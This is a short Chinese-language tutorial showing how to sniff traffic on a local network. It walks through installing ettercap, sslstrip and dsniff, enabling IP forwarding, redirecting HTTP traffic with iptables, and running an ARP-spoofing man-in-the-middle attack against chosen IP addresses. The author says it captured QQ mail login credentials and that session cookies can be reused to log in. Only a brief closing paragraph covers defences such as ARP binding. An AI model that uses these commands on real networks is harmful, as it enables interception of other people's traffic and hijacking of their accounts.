一个简单的嗅探工具

首先声明一下这个不是原创，而且这个工具也比较老了主要是帮助大家稍微理解一下黑客在局域网中是怎么获取数据的。首先我们来看一下程序运行的逻辑图

 

一准备工作：

我们需要安装几个软件我的环境是centos6.5

使用yum安装

yum -y install ettercap

yum -y install arpspoof sslstrip 

yum -y install arpspoof

yum -y install dsniff ssldump

二开启路由转发

因为我们在伪装成了路由器之后 我们需要把用户的数据转发到路由器，所有需要开启我机器的路由转发功能

echo ‘1’ > /proc/sys/net/ipv4/ip_forward   #也可以手动去修改

三开启iptables

通过iptables把http数据导入到10000端口我们用sslstrip监听10000端口并得到我们想要的数据

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

-t 表示要操作的表 nat表示修改nat表

-A 追加数据  PREROUTING路由前的链 追加一条规则到路由前的链

-p 指的是被过滤包的协议

--destination-port 80指被过滤包的目的端口是80 后面指的是将80端口的数据转发到10000端口

四启动sslstrip监控10000端口

sslstrip  -l 10000

五利用ettercap进行arp欺骗（也就是伪装成路由器）

ettercap -T -q -M arp:remote /172.16.85.1/172.16.85.2/

-T 表示基于文本界面 因为在linux里面运行

-q  静默模式（不回显）

-M  启动arp欺骗攻击  (这一步就是伪装路由器)

//里面填写需要嗅探的机器IP 可以填入网段表示嗅探一个网段说有的信息

效果:

 

我们登录了qq获取了qq邮箱的登录账号和密码 但是密码是加密的.我们只能通过下载cooki导入到自己的电脑来登录，不能直接获取密码了.

下面说下防御:

Sslstrip的攻击方式是一种中间人攻击，需要进行arp欺骗，也就是说如果不能获取你的数据他的工具再好也破解不到你的数据，所有我们需要设置好浏览器本身的安全以及需要绑定mac和ip和网关和本机双向绑定，或者启动arp防火墙对arp攻击进行防御